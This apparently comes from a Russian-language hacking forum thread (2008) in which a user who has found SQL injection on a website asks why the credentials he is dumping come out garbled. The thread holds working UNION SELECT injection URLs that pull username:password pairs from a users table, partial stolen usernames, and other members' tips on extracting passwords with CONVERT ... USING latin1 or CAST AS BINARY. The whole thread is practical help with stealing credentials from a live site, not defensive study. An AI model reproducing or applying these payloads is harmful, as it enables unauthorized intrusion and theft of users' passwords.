Доброго дня античатовцы.
Вопрос следующий: на сайте нашел скуль, разделался с ней как написано в учебниках, в результате получил такую инъекцию site.com/details.php?id=-5'+union+select+1,concat(username,char(58),passwor d),3+from+users_m_t+limit+10,1/*
по идеи должны вываливаться пары логин:пароль, но тут облом вышел, получаю вот что
shilpa:^��f�
patelph1:g�r1�n ну и т.д...
Что это за каракули в паролях?
Думал дело в кодировке, но смена не помогла.
Посмотри в какой кодировке тебе отдаётся страница... Проблема как раз в кодировке, возможно это можно обойти с помощью Convert... Без ссылки не могу сказать более точно...
либо покоцаные, либо кодировка не та, либо попробуй using latin1 и т.п.
попробовал вот так
http://site.com/details.php?id=-5'+union+select+1,concat(username,char(58),convert (password+using+latin1)),3+from+users_m_t+limit+10 ,1/*
те же каракули
при использовании cast (... as binary) тоже ничего хорошего.
Последний раз редактировалось mr.celt; 26.05.2008 в 17:35..